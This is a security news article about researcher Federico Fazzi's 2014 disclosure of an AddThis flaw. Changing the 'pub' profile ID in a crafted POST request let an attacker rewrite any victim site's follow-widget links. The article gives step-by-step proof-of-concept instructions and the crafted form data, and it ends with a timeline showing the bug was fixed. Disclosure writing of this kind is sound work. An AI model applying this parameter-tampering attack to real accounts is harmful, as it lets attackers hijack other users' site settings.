How to gain control of any Addthis user account

The security expert Federico Fazzi has disclosed a serious vulnerability in the Addthis.com service that allows attackers to take control of any account.

The Italian security expert Federico Fazzi has discovered a serious vulnerability in the Addthis.com service that allows attackers to take control of any Addthis account. AddThis is the world’s largest content sharing and social insights platform, it prvides a suite of free website plugins to add like, share and follow buttons to any website.

Federico was adding it to his wensite when decide to perform some tests to verify is the usage of the popular plugin is secure. The researcher analyzed a few HTTP requests, his attention was mainly focused on the manipulation of the profileID parameter which is visible in the source code (e.g. ra-XXXXXXXXXXXXXXXX ). Federico noticed that it was possible to use any profileID and atc as the associate account.

Proof of Concept:

User_X = ra-5438e922313abc3a attacker
User_Y = ra-538ce0c960e04da4 victim

ra-XXXXXXXXXXXXXXXX reference to User ProfileId

1. User_X visits the User_Y’s website that use Addthis plugin
2. User_X inspect the page source code and search for the User_Y’s profileID string ra-538ce0c960e04da4
3. User_X logins in to his Addthis.com account (ra-5438e922313abc3a was assigned to User_X)
4. User_X makes a POST Request to:
   https://www.addthis.com/meta-data/boost-create-widget endpoint with a crafted header
   (Live HTTP Headers) using method boost-create-widget
5. Before User_X makes a POST Request, The pub property needs to be changed to vulnerable site property value (ex. (User_X) ra-5438e922313abc3a => (User_Y) ra-538ce0c960e04da4)

Example POST Request Header

Remote Address:208.49.103.220:443
Request URL:https://www.addthis.com/meta-data/boost-create-widget
Request Method:POST
Status Code:200 OK
Request Headersview parsed
POST /meta-data/boost-create-widget HTTP/1.1
Host: www.addthis.com
Connection: keep-alive
Content-Length: 1070
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
[..]

Crafted POST Form Data

pub:ra-538ce0c960e04da4      // (User_X) ra-5438e922313abc3a => (User_Y) ra-538ce0c960e04da4
template:_default
widget[enabled]:true
widget[title]:Follow
widget[size]:large
widget[orientation]:vertical
widget[elements]:.addthis_vertical_follow_toolbox
widget[id]:flwv widget[services][0][id]:pwned widget[services][0][service]:facebook
widget[services][0][svc]:facebook
widget[services][0][name]:Facebook
widget[services][0][url]:http://www.facebook.com/pwned
widget[services][1][id]:pwned widget[services][1][service]:twitter
widget[services][1][svc]:twitter
widget[services][1][name]:Twitter
widget[services][1][url]:http://twitter.com/intent/follow?source=followbutton&variant=1.0&screen_name=pwned
widget[services][2][id]:pwned widget[services][2][service]:linkedin widget[services][2][svc]:linkedin widget[services][2][name]:LinkedIn
widget[services][2][url]:http://www.linkedin.com/in/pwned

Now User_X receives a 201 response.
While in, the User_Y website plugin data get updated with pwned property value submitted by the User_X.

Note that, a malicious user can perform any request through vulnerable user pub property id value. In addition, the website Addthis.com is devoid largely of controls CSRF for this reason there’s no proof of concept, It is really clear..

Example video scenario using Addthis “/boost-create-widget” method

• 10/10/2014 – Bug Reported to Addthis Support
• 13/10/2014 – Addthis Support provided a response
• 14/10/2014 – Reply from Addthis that informs the researcher that the bug was fixed
• 14/10/2014 – Public disclosure

Federico Fazzi (aka eurialo)
Linux, Security and Bitcoin enthusiast, hacktivist and security researcher.

(Security Affairs –  AddThis, hacking)